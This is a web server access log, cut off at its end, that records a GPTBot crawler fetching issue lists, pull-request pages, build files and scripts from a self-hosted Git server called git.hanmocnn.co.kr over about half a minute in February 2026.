"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt?display=source" [Client 74.7.227.38] [Length 14095] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt?display=source" [Client 74.7.227.38] [Length 14098] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt?display=source" [Client 74.7.227.38] [Length 13811] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt?display=source" [Client 74.7.227.38] [Length 14097] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py?display=source" [Client 74.7.227.38] [Length 20569] [Gzip 6.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:19:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt?display=source" [Client 74.7.227.38] [Length 12523] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:19:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt?display=source" [Client 74.7.227.38] [Length 11494] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:19:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12023] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20583] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md" -[17/Feb/2026:19:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9962] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2freply%2fcmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 44210] [Gzip 14.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12022] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 74.7.227.38] [Length 11799] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:19:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:19:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9950] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:19:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat?display=source" [Client 74.7.227.38] [Length 13279] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:19:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md?display=source" [Client 74.7.227.38] [Length 24029] [Gzip 6.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:19:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat?display=rendered" [Client 74.7.227.38] [Length 11044] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:19:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat?display=source" [Client 74.7.227.38] [Length 12254] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:19:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:19:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:19:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:19:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:19:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:19:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:19:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 14979] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:19:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" -[17/Feb/2026:19:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21826] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" -[17/Feb/2026:19:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 74.7.227.38] [Length 11215] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:19:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 74.7.227.38] [Length 11220] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 